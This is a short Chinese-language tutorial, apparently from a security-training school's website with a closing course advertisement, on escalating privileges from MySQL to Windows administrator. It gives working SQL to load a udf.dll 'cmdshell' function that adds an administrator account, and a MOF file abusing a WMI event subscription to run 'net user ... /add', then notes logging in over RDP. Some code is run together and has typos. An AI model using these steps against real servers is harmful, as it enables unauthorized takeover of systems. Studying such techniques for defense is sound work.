Mysql_UDF 提权

　　要求：

　　1.目标系统是 Windows(Win2000,XP,Win2003);

　　2.拥有 MYSQL 的某个用户账号，此账号必须有对 mysql 的 insert 和 delete 权限以创建和抛弃函数

　　 3.有 root 账号密码 导出 udf: MYSQL 5.1 以上版本，必须要把 udf.dll 文件放到 MYSQL 安装目录下的 lib\plugin 文件夹下才能创建自定义函数可以再 mysql 里输入select @@basedirshow variables like ‘%plugins%’寻找 mysql 安装路径。

　　提权：使用 SQL 语句创建功能函数。

　　语法：Create Function 函数名(函数名只能为下面列表中的其中之一)

　　returns string soname ‘导出的 DLL 路径’；　　

create function cmdshell returns string

soname ‘udf.dll’select cmdshell(‘net user arsch arsch

/add’);select

cmdshell(‘net localgroup

administrators arsch /add’);

drop function

　　cmdshell;该目录默认是不存在的，这就需要我们使用 webshell 找到 MYSQL 的安装目录，并在安装目录下创建lib\plugin 文件夹，然后将 udf.dll 文件导出到该目录即可。

　　Mysql mof 提权　　

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name =

"filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa

\"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};

instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine =

"JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user

waitalone waitalone.cn /add\")";};

instance of __FilterToConsumerBinding{Consumer

= $Consumer;Filter = $EventFilter;};

　　其中的第 18 行的命令，上传前请自己更改。

　　执行 load_file 及 into dumpfile 把文件导出到正确的位置即可。　　

select load file('c:/wmpub/nullevt.mof') into dumpfile

'c:/windows/system32/wbem/mof/nullevt.mov'

　　执行成功后，即可添加一个普通用户，然后你可以更改命令，再上传导出执行把用户提升到管理员权限，然后 3389 连接之就 ok 了。

　　更多关于“网络安全培训”的问题，欢迎咨询千锋教育在线名师。千锋教育多年办学，课程大纲紧跟企业需求，更科学更严谨，每年培养泛IT人才近2万人。不论你是零基础还是想提升，都可以找到适合的班型，千锋教育随时欢迎你来试听。